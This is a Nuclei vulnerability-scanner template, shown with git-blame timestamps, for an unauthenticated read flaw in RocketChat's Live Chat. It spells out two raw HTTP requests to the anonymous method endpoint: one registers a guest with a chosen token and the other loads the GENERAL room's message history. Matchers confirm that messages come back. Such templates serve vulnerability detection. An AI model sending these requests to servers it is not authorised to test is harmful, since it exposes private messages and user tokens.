nuclei-templates/vulnerabilities/rocketchat/unauth-message-read.yaml

41 lines
1.4 KiB
YAML
Raw Normal View History

2021-09-19 23:23:22 +00:00
id: rocketchat-unauth-access
2021-03-29 11:35:11 +00:00
2021-03-29 06:42:11 +00:00
info:
name: RocketChat Unauthenticated Read Access
author: rojanrijal
severity: critical
2021-03-29 11:35:11 +00:00
description: An issue with the Live Chat accepting invalid parameters could potentially allow unauthenticated access to messages and user tokens.
reference: https://docs.rocket.chat/guides/security/security-updates
2021-09-19 23:23:22 +00:00
tags: rocketchat,unauth
2021-03-29 06:42:11 +00:00
requests:
- raw:
- |
POST /api/v1/method.callAnon/cve_exploit HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/json
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
{"message":"{\"msg\":\"method\",\"method\":\"livechat:registerGuest\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"name\":\"cve-2020-nuclei\",\"email\":\"cve@nuclei.local\"}],\"id\":\"123\"}"}
- |
POST /api/v1/method.callAnon/cve_exploit HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/json
{"message":"{\"msg\":\"method\",\"method\":\"livechat:loadHistory\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"rid\":\"GENERAL\"}],\"msg\":\"123\"}"}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
2021-03-29 11:35:11 +00:00
- '"{\"msg\":\"result\",\"result\":{\"messages\"'
- '"success":true'
2021-03-29 06:42:11 +00:00
part: body
condition: and